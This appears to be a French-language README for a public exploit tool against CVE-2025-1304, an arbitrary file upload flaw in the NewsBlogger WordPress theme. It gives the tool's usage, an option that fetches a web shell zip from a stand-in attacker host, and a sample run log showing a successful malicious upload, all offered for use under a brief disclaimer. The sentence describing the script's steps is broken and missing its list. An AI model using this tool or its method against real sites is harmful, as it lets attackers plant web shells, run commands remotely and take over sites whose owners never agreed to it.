
Le thème WordPress NewsBlogger <= 0.2.5.1 est vulnérable au téléchargement de fichier arbitraire.
Score CVSS : 8.8 (Élevé)
Type de vulnérabilité : Téléchargement arbitraire de fichier
Composant : Thème WordPress
Identifiant CVE : CVE-2025-1304
Le thème WordPress NewsBlogger (versions <= 0.2.5.1) est vulnérable à un téléchargement arbitraire de fichier via le panneau d'accueil administrateur.
Cette vulnérabilité permet à tout utilisateur authentifié — y compris ceux disposant du rôle minimal Abonné — de télécharger une archive .zip malveillante contenant un shell web.
Le téléchargement s'effectue via un champ d'URL de plugin non validé, qui ne parvient pas à vérifier correctement le contenu ou le type du fichier téléchargé.
Une attaque réussie pourrait entraîner la compromission complète du site Web, y compris l'exécution de commandes à distance et l'escalade de privilèges.
Ce script Python automatise l'exploitation de la vulnérabilité en :
nonce de la page d'accueil vulnérable.python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
Ce code est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
Par : Nxploited ( Khaled Alenazi )